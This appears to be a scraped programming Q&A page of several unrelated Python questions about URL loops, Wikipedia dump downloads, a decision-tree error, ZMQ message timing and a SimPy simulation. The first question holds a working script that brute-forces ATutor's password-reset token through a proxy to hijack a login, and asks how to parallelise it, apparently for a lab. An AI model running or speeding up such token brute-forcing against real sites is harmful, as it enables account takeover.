I have a method that iterates through a load of values and send a requests call for each. This works fine however it takes a LONG time. I want to speed this up using multiprocessing in Python3.
My question is what is the correct way to implement this using multiprocessing so I can speed up these requets?
The existing method is as so:
def change_password(id, prefix_length):
count = 0
# e = None
# m = 0
for word in map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length))):
# code = f'{word}{id}'
h = hash_string(word)[0:10]
url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
print(f"Issuing reset request with: {h}")
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
s = requests.Session()
res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})
if res.status_code == 302:
return True, s.cookies, count
else:
count += 1
return False, None, count
I have tried to convert it based on the first example in the Python3 docs here however it just seems to hang when I start the script. No doubt I have implemented it wrong
def send_request(word):
# code = f'{word}{id}'
h = hash_string(word)[0:10]
url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
print(f"Issuing reset request with: {h}")
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
s = requests.Session()
res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})
if res.status_code == 302:
return True, word
else:
return False
It is being called from a modified version of the original method as so:
def change_password(id, prefix_length):
count = 0
# e = None
# m = 0
words = map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length)))
with Pool(10) as pool:
results, word = pool.map(send_request, words)
if results:
return True, word
Related
I want to loop though a number of url requests but I'm having an issue, when I run the code it doesnt loop though all the numbers and only requests the page once with the output.
So my question is, how do I loop though the numbers in the url while requesting each one + capturing all the source code I need. Everything works except the counting.
this is the code I have managed to write so far
import urllib.request
import re
count = 1
while count <= 44:
url = ('https://example/page=%i' % count)
count += 1
req = urllib.request.Request(url)
resp = urllib.request.urlopen(req)
respData = resp.read()
paragraphs = re.findall(r';"><span>(.*?)</span></a></td><td',str(respData))
for eachP in paragraphs:
print(eachP)
You have problem in your loop you iterate over all 44 urls, but request only last one url, this is correct implementation:
import urllib.request
import re
def handle_url(url):
req = urllib.request.Request(url)
resp = urllib.request.urlopen(req)
respData = resp.read()
paragraphs = re.findall(r';"><span>(.*?)</span></a></td><td',str(respData))
for eachP in paragraphs:
print(eachP)
count = 1
while count <= 44:
handle_url('https://example/page=%i' % count)
count += 1
if you don't like function you can simply move all to while loop:
import urllib.request
import re
def handle_url(url):
count = 1
while count <= 44:
url = 'https://example/page=%i' % count
count += 1
req = urllib.request.Request(url)
resp = urllib.request.urlopen(req)
respData = resp.read()
paragraphs = re.findall(r';"><span>(.*?)</span></a></td><td',str(respData))
for eachP in paragraphs:
print(eachP)
I am getting the below error when I am downloading files using multiprocessing. I am downloading Wikipedia page views and they have it by hour so it might include a lot of downloading.
Any recommendation to why this error is caused and HOW TO SOLVE IT? Thanks
MaybeEncodingError: Error sending result:
''. Reason: 'TypeError("cannot serialize
'_io.BufferedReader' object",)'
import fnmatch
import requests
import urllib.request
from bs4 import BeautifulSoup
import multiprocessing as mp
def download_it(download_file):
global path_to_save_document
filename = download_file[download_file.rfind("/")+1:]
save_file_w_submission_path = path_to_save_document + filename
request = urllib.request.Request(download_file)
response = urllib.request.urlopen(request)
data_content = response.read()
with open(save_file_w_submission_path, 'wb') as wf:
wf.write(data_content)
print(save_file_w_submission_path)
pattern = r'*200801*'
url_to_download = r'https://dumps.wikimedia.org/other/pagecounts-raw/'
path_to_save_document = r'D:\Users\Jonathan\Desktop\Wikipedia\\'
def main():
global pattern
global url_to_download
r = requests.get(url_to_download)
data = r.text
soup = BeautifulSoup(data,features="lxml")
list_of_href_year = []
for i in range(2):
if i == 0:
for link in soup.find_all('a'):
lien = link.get('href')
if len(lien) == 4:
list_of_href_year.append(url_to_download + lien + '/')
elif i == 1:
list_of_href_months = []
list_of_href_pageviews = []
for loh in list_of_href_year:
r = requests.get(loh)
data = r.text
soup = BeautifulSoup(data,features="lxml")
for link in soup.find_all('a'):
lien = link.get('href')
if len(lien) == 7:
list_of_href_months.append(loh + lien + '/')
if not list_of_href_months:
continue
for lohp in list_of_href_months:
r = requests.get(lohp)
data = r.text
soup = BeautifulSoup(data,features="lxml")
for link in soup.find_all('a'):
lien = link.get('href')
if "pagecounts" in lien:
list_of_href_pageviews.append(lohp + lien)
matching_list_of_href = fnmatch.filter(list_of_href_pageviews, pattern)
matching_list_of_href.sort()
with mp.Pool(mp.cpu_count()) as p:
print(p.map(download_it, matching_list_of_href))
if __name__ == '__main__':
main()
As Darkonaut proposed. I used multithreading instead.
Example:
from multiprocessing.dummy import Pool as ThreadPool
'''This function is used for the download the files using multi threading'''
def multithread_download_files_func(self,download_file):
try:
filename = download_file[download_file.rfind("/")+1:]
save_file_w_submission_path = self.ptsf + filename
'''Check if the download doesn't already exists. If not, proceed otherwise skip'''
if not os.path.exists(save_file_w_submission_path):
data_content = None
try:
'''Lets download the file'''
request = urllib.request.Request(download_file)
response = urllib.request.urlopen(request)
data_content = response.read()
except urllib.error.HTTPError:
'''We will do a retry on the download if the server is temporarily unavailable'''
retries = 1
success = False
while not success:
try:
'''Make another request if the previous one failed'''
response = urllib.request.urlopen(download_file)
data_content = response.read()
success = True
except Exception:
'''We will make the program wait a bit before sending another request to download the file'''
wait = retries * 5;
time.sleep(wait)
retries += 1
except Exception as e:
print(str(e))
'''If the response data is not empty, we will write as a new file and stored in the data lake folder'''
if data_content:
with open(save_file_w_submission_path, 'wb') as wf:
wf.write(data_content)
print(self.present_extract_RC_from_RS + filename)
except Exception as e:
print('funct multithread_download_files_func' + str(e))
'''This function is used as a wrapper before using multi threading in order to download the files to be stored in the Data Lake'''
def download_files(self,filter_files,url_to_download,path_to_save_file):
try:
self.ptsf = path_to_save_file = path_to_save_file + 'Step 1 - Data Lake\Wikipedia Pagecounts\\'
filter_files_df = filter_files
self.filter_pattern = filter_files
self.present_extract_RC_from_RS = 'WK Downloaded-> '
if filter_files_df == '*':
'''We will create a string of all the years concatenated together for later use in this program'''
reddit_years = [2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018]
filter_files_df = ''
'''Go through the years from 2005 to 2018'''
for idx, ry in enumerate(reddit_years):
filter_files_df += '*' + str(ry) + '*'
if (idx != len(reddit_years)-1):
filter_files_df += '&'
download_filter = list([x.strip() for x in filter_files_df.split('&')])
download_filter.sort()
'''If folder doesn't exist, create one'''
if not os.path.exists(os.path.dirname(self.ptsf)):
os.makedirs(os.path.dirname(self.ptsf))
'''We will get the website HTML elements using beautifulsoup library'''
r = requests.get(url_to_download)
data = r.text
soup = BeautifulSoup(data,features="lxml")
list_of_href_year = []
for i in range(2):
if i == 0:
'''Lets get all href available on this particular page. The first page is the year page'''
for link0 in soup.find_all('a'):
lien0 = link0.get('href')
'''We will check if the length is 4 which corresponds to a year'''
if len(lien0) == 4:
list_of_href_year.append(url_to_download + lien0 + '/')
elif i == 1:
list_of_href_months = []
list_of_href_pageviews = []
for loh in list_of_href_year:
r1 = requests.get(loh)
data1 = r1.text
'''Get the webpage HTML Tags'''
soup1 = BeautifulSoup(data1,features="lxml")
for link1 in soup1.find_all('a'):
lien1 = link1.get('href')
'''We will check if the length is 7 which corresponds to the year and month'''
if len(lien1) == 7:
list_of_href_months.append(loh + lien1 + '/')
for lohm in list_of_href_months:
r2 = requests.get(lohm)
data2 = r2.text
'''Get the webpage HTML Tags'''
soup2 = BeautifulSoup(data2,features="lxml")
for link2 in soup2.find_all('a'):
lien2 = link2.get('href')
'''We will now get all href that contains pagecounts in their name. We will have the files based on Time per hour. So 24 hrs is 24 files
and per year is 24*365=8760 files in minimum'''
if "pagecounts" in lien2:
list_of_href_pageviews.append(lohm + lien2)
existing_file_list = []
for file in os.listdir(self.ptsf):
filename = os.fsdecode(file)
existing_file_list.append(filename)
'''Filter the links'''
matching_fnmatch_list = []
if filter_files != '':
for dfilter in download_filter:
fnmatch_list = fnmatch.filter(list_of_href_pageviews, dfilter)
i = 0
for fnl in fnmatch_list:
'''Break for demo purpose only'''
if self.limit_record != 0:
if (i == self.limit_record) and (i != 0):
break
i += 1
matching_fnmatch_list.append(fnl)
'''If the user stated a filter, we will try to remove the files which are outside that filter in the list'''
to_remove = []
for efl in existing_file_list:
for mloh in matching_fnmatch_list:
if efl in mloh:
to_remove.append(mloh)
'''Lets remove the files which has been found outside the filter'''
for tr in to_remove:
matching_fnmatch_list.remove(tr)
matching_fnmatch_list.sort()
'''Multi Threading of 200'''
p = ThreadPool(200)
p.map(self.multithread_download_files_func, matching_fnmatch_list)
except Exception as e:
print('funct download_files' + str(e))
From the accepted answer, I understood that it is simply replacing from multiprocessing import Pool by from multiprocessing.dummy import Pool.
This worked for me.
I get, "TypeError: Question() takes no arguments" (where Question is an object of class Question) when trying to execute the code below.
I'm using jupyter notebook and have checked most of my indentation, Tthe class Question has 2 attributes, I have an init method...
Issue is related to the function find_best_split(rows) below.
I have added an image of the error console output here
class Question:
def __init__(self, column, value):
self.column = column
self.value = value
def match(self, example):
val = example[self.column]
if is_numeric(val):
return val >= self.value
else:
return val == self.value
def __repr__(self):
condition = "=="
if is_numeric(self.value):
condition = ">="
return "Is %s %s %s?" % (header[self.column], condition, str(self.value))
def partition(rows, question):
true_rows, false_rows = [], []
for row in rows:
if question.match(row):
true_rows.append(row)
else:
false_rows.append(row)
return true_rows, false_rows
` Error points to this function, specifically "question = Question(col, val)"
def find_best_split(rows):
best_gain = 0
best_question = None
current_uncertainty = gini(rows)
n_features = len(rows[0]) -1 # number of columns
for col in range(n_features):
values = set([row[col] for row in rows]) # unique values in the column
for val in values: #now for each value
question = Question(col, val)
# trying to split the data set
true_rows, false_rows = partition(rows, question)
# skips this split if it doesn't divide the data set.
if len(true_rows) == 0 or len(false_rows) == 0:
continue
# calculate the information gain from this split
gain = info_gain(true_rows, false_rows, current_uncertainty)
# you can use > instead of >= below but I wanted the data set to look a certain way for this example.
if gain >= best_gain:
best_gain, best_question = gain, question
return best_gain, best_quesiton
`
class Decision_Node:
def __init__(self, question, true_branch, false_branch):
self.question = question
self.true_branch = true_branch
self.false_branch = false_branch
def build_tree(rows):
gain, question = find_best_split(rows)
if gain == 0:
return Leaf(rows)
true_rows, false_rows = partition(rows, question)
true_branch = build_tree(true_rows)
false_branch = build_tree(false_rows)
return Decision_Node(question, true_branch, false_branch)
if __name__ == '__main__':
my_tree = build_tree(training_data)
print_tree(my_tree)
# Evaluate
testing_data = [
["Green", 3, "Mango"],
["Yellow", 4, "Mango"],
["Red", 2, "Grape"],
["Red", 1, "Grape"],
["Yellow", 3, "Lemon"],
]
for row in testing_data:
print ("Actual: %s. Predicted: %s" % (row[-1], print_leaf(classify(row, my_tree))))
this code I use below is a ZMQ sub to a publisher that is giving me data. It uses the counter to tell me when its 30 and 59 seconds to run my write to CSV every 30 seconds or so.
Problem: I am now timing all of the processes in my thread. the lines where message and message2 = socket.recv_string() is taking anywhere from half a second to 20 seconds to receive string. Thus causing the thread to miss the 30 and 59 second intervals I set. This was not happening yesterday. The other timers for the if statements are taking .00001 or 0.0 seconds. So that part isnt the problem
Im wondering what could effect this. Could it be the processing power of my computer? Or is the receive string based on how long it waits for the publisher to actually send something?
I'm not running in a dev or production environment and its on a shared server with something like 15 other people and its virtual. A zero client. I've never had this problem before and on another script i have set up for another ZMQ pub/sub I'm receiving messages in .01 or .001 seconds all the way to 3 seconds. Which is more manageable but the norm was .01.
Any tips or help would be amazing. Thanks in advance
import zmq
import pandas as pd
import time
import threading
df_fills = pd.DataFrame()
df_signal = pd.DataFrame()
second_v = [30,59]
s = 0
m = 0
h = 0
d = 0
def counter():
global h,s,m,d
while True:
s += 1
#print("Second:{}".format(s))
if s >=60:
m +=1
s = 0
if m >= 60:
h += 1
m = 0
if h >= 24:
d += 1
h = 0
#print(s)
time.sleep(1)
class zmq_thread(threading.Thread):
def __init__(self,name):
threading.Thread.__init__(self)
self.name = name
def run(self):
global df_fills, second_v,s
print('zmq started')
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect(SERVER)
socket.setsockopt_string(zmq.SUBSCRIBE,'F')
print('socket connected')
tickers = [a bunch of tickers]
while True:
try:
start2 = time.time()
if s == 30:
print('break')
if df_fills.empty == True:
print('running fill thread again')
z = zmq_thread('Start_ZMQ')
#time.sleep(.7)
z.run()
else:
start = time.time()
print('writing fills')
filename = "a CSV"
with open(filename, 'a') as f:
df_fills.to_csv(f, encoding = 'utf-8', index = False, header = False)
f.close()
print('wrote fills')
end = time.time()
print(end-start)
df_fills = df_fills.iloc[0:0]
z = zmq_thread('Start_ZMQ')
z.run()
return df_fills
end2 = time.time()
print(end2-start2)
start3 = time.time()
message = socket.recv_string()
message2 = socket.recv_string()
end3 = time.time()
print(end3-start3, 'message timing')
print(s)
start1 = time.time()
if message == 'F':
# message2_split = message2.split("'")
message2_split = message2.split(";")
message3_split = [e[3:] for e in message2_split]
message4 = pd.Series(message3_split)
if message4[0] in tickers:
df_fills = df_fills.append(message4, ignore_index=True)
print('fill')
end1 = time.time()
print(end1-start1)
except KeyboardInterrupt:
break
counter = threading.Thread(target = counter)
zmq_loop = zmq_thread('Start_ZMQ')
#%%
counter.start()
zmq_loop.start()
I didn't realize that ZMQ typical recv_string is by default blocking. So I did this
message = socket.recv_string(flags = zmq.NOBLOCK)
message2 = socket.recv_string(flags = zmq.NOBLOCK)
except zmq.ZMQError as e:
if e.errno == zmq.EAGAIN:
pass
else:
if message == 'ABA_BB':
message2_split = message2.split(";")
message3_split = [e[3:] for e in message2_split]
message4 = pd.Series(message3_split)
#print(message4)
if message4[2] == '300':
df_signal = df_signal.append(message4, ignore_index=True)
print('Signal Appended')
Im trying to simulate two machines working, and failing at random times. When they fail they call assistance. These two machines is part of bigger system of different machines, which needs to know when its neighbor has failed to do its job.
So far, I have made the simulate of the two machines, but I cant figure out how to send messages to their neighbors without each machine needing to know the whole system?
This is what I have so far:
import simpy
import random
random_seed=42
MTTF = 3500
break_mean = 1 / MTTF
sim_time = 4 * 7*24*60 # 4 weeks 24/7
num_machines = 2
rep_time = 30
tpp = 20 #20 minutes to make each part
neighbour = 3 #How many should it send to?
#Creating a class called messaging which is an object.
class messaging(object):
#DEfing the initilizing function, and initilize self, Environment, and capacity which is set to infinity, by a simpy core-function.
def __init__(self, env, capacity=simpy.core.Infinity):
self.env = env
self.capacity = capacity
self.pipes = []
#Making a function which work on everything that is a part of the message. With name Put.
def put(self, value):
if not self.pipes: #How to get this error?
raise runtime_error('There are no output pipes.')
#Create a variable, events, store to it pipe values
events = broken_machine()
return self.env.all_of(events)
def get_output_conn(self):
#Set the capacity of pipe variable to store infinity.
pipe = simpy.Store(self.env, capacity=self.capacity)
#to each pipes, add(or append) pipe
self.pipes.append(pipe)
return pipe
def mesg_generator(number, env, out_pipe):
msg = ('Failed')
def message_reciever(name, env, in_pipe):
while True:
msg = yield in_pipe.get()
print("%s received message: %s" % (number, msg[1]))
def time_per_part():
return tpp
def ttf():
return random.expovariate(break_mean)
class Machine(object):
def __init__(self, env, number, repair):
#self.arg = arg
self.env = env
self.number = number
self.parts_made = 0
self.times_broken = 0
self.broken = False
self.process = env.process(self.working(repair))
env.process(self.broken_machine())
def working(self, repair):
while True:
work = time_per_part()
while work:
try:
begin = self.env.now
yield self.env.timeout(work)
work = 0
except simpy.Interrupt:
self.broken = True
work -= self.env.now - begin
with repair.request(priority = 1) as req:
yield req
yield self.env.timeout(rep_time)
self.times_broken +=1
yield message_reciever()
#print('Machine down')
self.broken = False #Machine fixed again
self.parts_made +=1
def broken_machine(self):
while True:
yield self.env.timeout(ttf())
if not self.broken:
self.process.interrupt()
def other_jobs(env, repair):
while True:
work = tpp
while work:
with repair.request(priority=2) as req:
yield req
try:
begin = env.now
yield env.timeout(work)
work = 0
except simpy.Interrupt:
work -= env.now - begin
print("This simulates machines 3 and 4 doing the same tasks.")
random.seed(random_seed)
env = simpy.Environment()
pipe = simpy.Store(env)
bc_pipe = messaging(env)
repair = simpy.PreemptiveResource(env, capacity = 1)
machines = [Machine(env, 'Machine %d' % i, repair)
for i in range(num_machines)]
env.process(other_jobs(env, repair))
env.run(until=sim_time)
#Show how many times each machine failed:
for machine in machines:
print("%s broke down %d times" %(machine.number, machine.times_broken))